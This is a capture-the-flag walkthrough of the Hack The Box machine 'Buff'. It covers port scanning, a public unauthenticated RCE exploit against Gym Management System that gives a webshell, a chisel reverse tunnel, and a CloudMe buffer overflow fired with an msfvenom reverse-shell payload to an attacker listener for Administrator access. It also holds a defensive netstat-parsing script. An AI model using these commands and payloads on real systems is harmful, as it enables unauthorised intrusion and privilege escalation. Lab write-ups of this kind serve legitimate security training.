
Hack The Box : Buff

10 September, 2021

The initial nmap scan shows only one open port; the full port scan later also finds 7680, which the script scan could not identify.

---------------------Starting Port Scan-----------------------
PORT     STATE SERVICE
8080/tcp open  http-proxy
---------------------Starting Script Scan-----------------------
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: mrb3n's Bro Hut
---------------------Starting Full Scan------------------------
PORT     STATE SERVICE
7680/tcp open  pando-pub
8080/tcp open  http-proxy
Making a script scan on extra ports: 7680
PORT     STATE SERVICE    VERSION
7680/tcp open  pando-pub?

While gobuster was running, I checked out the website, and the contact page contained a hint about the backend of this site.

User

I searched for exploits for "Gym Management System" and found a number of them.

$ searchsploit gym management
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                        |  Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - 'id' SQL Injection                                                                                        | php/webapps/48936.txt
Gym Management System 1.0 - Authentication Bypass                                                                                     | php/webapps/48940.txt
Gym Management System 1.0 - Stored Cross Site Scripting                                                                               | php/webapps/48941.txt
Gym Management System 1.0 - Unauthenticated Remote Code Execution                                                                     | php/webapps/48506.py
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

Using exploit 48506, I was able to get a shell as shaun and therefore read the user flag.

$ python2 /usr/share/exploitdb/exploits/php/webapps/48506.py http://10.10.10.198:8080/
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
buff\shaun
C:\xampp\htdocs\gym\upload> type C:\Users\shaun\Desktop\user.txt
<flag>

Root

I found an executable in shaun's Downloads folder.

C:\xampp\htdocs\gym\upload> dir C:\Users\shaun\Downloads
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users\shaun\Downloads

14/07/2020  13:27    <DIR>          .
14/07/2020  13:27    <DIR>          ..
16/06/2020  16:26        17,830,824 CloudMe_1112.exe
               1 File(s)     17,830,824 bytes
               2 Dir(s)   7,106,600,960 bytes free

Assuming from the file name that the version is 1.11.2, there are several buffer overflow exploits available.

$ searchsploit cloudme
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                        |  Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC)                                                                                                | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)                                                                                       | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)                                                                                       | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)                                                                                      | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass)                                                                               | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)                                                                        | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow                                                                                           | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt                                                                                       | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)                                                                              | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow                                                                                               | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)                                                                            | windows_x86-64/remote/44784.py
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

The buffer overflow exploit 48389 was tested against Windows 10, so I decided to use that. It is a remote exploit, so I executed the CloudMe binary and verified that port 8888 was indeed open.

C:\xampp\htdocs\gym\upload>C:\Users\shaun\Downloads\CloudMe_1112.exe
C:\xampp\htdocs\gym\upload> netstat -a
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            BUFF:0                 LISTENING
  TCP    0.0.0.0:445            BUFF:0                 LISTENING
  TCP    0.0.0.0:5040           BUFF:0                 LISTENING
  TCP    0.0.0.0:7680           BUFF:0                 LISTENING
  TCP    0.0.0.0:8080           BUFF:0                 LISTENING
  TCP    0.0.0.0:49664          BUFF:0                 LISTENING
  TCP    0.0.0.0:49665          BUFF:0                 LISTENING
  TCP    0.0.0.0:49666          BUFF:0                 LISTENING
  TCP    0.0.0.0:49667          BUFF:0                 LISTENING
  TCP    0.0.0.0:49668          BUFF:0                 LISTENING
  TCP    0.0.0.0:49669          BUFF:0                 LISTENING
  TCP    10.10.10.198:139       BUFF:0                 LISTENING
  TCP    10.10.10.198:8080      10.10.16.5:38262       ESTABLISHED
  TCP    127.0.0.1:3306         BUFF:0                 LISTENING
  TCP    127.0.0.1:8888         BUFF:0                 LISTENING

There's a catch, though: the server listens only on 127.0.0.1, not 0.0.0.0, so it is not reachable from my machine directly. I learnt about Chisel from HackTricks and used it to forward port 8888 back to my host.

On Buff

C:\xampp\htdocs\gym\upload> .\chisel.exe client 10.10.16.5:4243 R:8888:127.0.0.1:8888

On my machine

$ ./chisel server -p 4243 --reverse
2021/09/10 12:24:41 server: Reverse tunnelling enabled
2021/09/10 12:24:41 server: Fingerprint qaI9x/PVWyLke4MZwFkek/J/UNltQTGHH4nEenA3ggk=
2021/09/10 12:24:41 server: Listening on http://0.0.0.0:4243
2021/09/10 12:24:58 server: session#1: tun: proxy#R:8888=>8888: Listening
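An added example, not part of the original writeup: a Python parser for the `netstat -a` output above that inventories LISTENING sockets by bind scope and lists the loopback-only ports. It shows the defender's side of the "catch": binding to 127.0.0.1 hides a service from a remote nmap scan but is no barrier once someone has a local shell, so such services deserve the same patching and hardening as externally exposed ones (the sample input is the writeup's own netstat excerpt).

```python
"""Inventory of Windows `netstat -a` LISTENING sockets by bind scope.

Added example for this writeup, not code from the original post: it shows
why CloudMe on 127.0.0.1:8888 was invisible to remote nmap yet reachable
from the host (and through a tunnel) once a local shell existed.
"""
import re
from typing import Dict, List

# Sample input: an excerpt of the `netstat -a` output shown in the writeup.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            BUFF:0                 LISTENING
  TCP    0.0.0.0:8080           BUFF:0                 LISTENING
  TCP    10.10.10.198:139       BUFF:0                 LISTENING
  TCP    10.10.10.198:8080      10.10.16.5:38262       ESTABLISHED
  TCP    127.0.0.1:3306         BUFF:0                 LISTENING
  TCP    127.0.0.1:8888         BUFF:0                 LISTENING
"""

# proto, local address, local port, state (foreign address is ignored)
_LINE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+\S+\s+(\S+)\s*$")


def bind_scope(addr: str) -> str:
    """Map a bind address to 'loopback', 'all' or 'interface'."""
    if addr in ("127.0.0.1", "[::1]"):
        return "loopback"
    if addr in ("0.0.0.0", "[::]"):
        return "all"
    return "interface"


def parse_listeners(netstat_text: str) -> Dict[int, List[str]]:
    """Return {port: [scopes...]} for every TCP socket in LISTENING state."""
    listeners: Dict[int, List[str]] = {}
    for line in netstat_text.splitlines():
        m = _LINE.match(line)
        if not m or m.group(1) != "TCP" or m.group(4) != "LISTENING":
            continue  # skip headers, UDP entries and established connections
        port = int(m.group(3))
        listeners.setdefault(port, []).append(bind_scope(m.group(2)))
    return listeners


def loopback_only_ports(netstat_text: str) -> List[int]:
    """Ports reachable from the host itself but from no other machine."""
    return sorted(p for p, scopes in parse_listeners(netstat_text).items()
                  if all(s == "loopback" for s in scopes))
```

Run against the sample, `loopback_only_ports` returns `[3306, 8888]`: the MySQL and CloudMe listeners that a remote port scan never sees.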

After trying a few payloads, windows/shell_reverse_tcp worked.

$ msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.16.5 LPORT=4242 -b '\x00\x0A\x0D' -f python -v payload
$ python 48389.py

I caught the shell as Administrator.

$ nc -lvnp 4242
listening on [any] 4242 ...

connect to [10.10.16.5] from (UNKNOWN) [10.10.10.198] 49705
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
buff\administrator

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
<flag>